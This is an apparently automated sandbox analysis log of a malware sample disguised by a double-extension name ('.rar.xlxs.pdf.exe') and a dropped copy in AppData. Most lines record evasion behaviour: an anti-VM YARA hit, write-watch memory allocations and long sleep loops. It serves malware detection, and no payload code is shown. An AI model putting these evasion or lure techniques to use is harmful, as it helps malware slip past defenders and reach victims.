Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 1080000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 2EA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 2C30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 77C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 87C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 8960000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 9960000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: A090000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: B090000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 1160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 2C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Memory allocated: 4C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 2630000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 28A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 26A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 6DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 7DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 7F30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 8F30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 9630000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: A630000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: B630000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 13E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 2D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Memory allocated: 4D90000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599858 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599734 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599613 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599474 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599350 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599242 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 599138 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598874 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 598000 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597853 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597732 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597624 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597515 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597296 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597187 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596968 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596749 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596640 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596531 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596421 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596312 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596203 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 596093 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595984 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595873 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595765 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595656 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595542 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595405 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595275 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 595145 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594648 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594218 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 594053 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593937 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593827 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593718 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593609 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593497 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593390 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593280 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593171 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 593061 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592953 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592843 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592731 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592624 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592515 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Thread delayed: delay time: 592406 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598640
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598271
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 598065
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597769
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597444
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597324
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597217
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 597108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595998
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595889
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595561
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594789
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594646
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 594024
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593916
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593719
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593609
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593470
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593356
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Thread delayed: delay time: 593249
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8621 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 929 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8996 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 539 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Window / User API: threadDelayed 5697 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe Window / User API: threadDelayed 4106 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Window / User API: threadDelayed 4305
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe Window / User API: threadDelayed 5534
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 6072 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060 Thread sleep count: 8621 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4428 Thread sleep count: 929 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -39660499758475511s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428 Thread sleep count: 5697 > 30 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599858s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7428 Thread sleep count: 4106 > 30 Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599613s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599474s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599350s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599242s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -599138s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -598874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -598000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597853s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597732s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597296s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -597078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596749s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596421s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -596093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595873s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595542s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595405s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595275s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -595145s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -594953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -594648s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -594406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -594218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -594053s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe TID: 7408 Thread sleep time: -593827s >= -30000s Jump to behavior
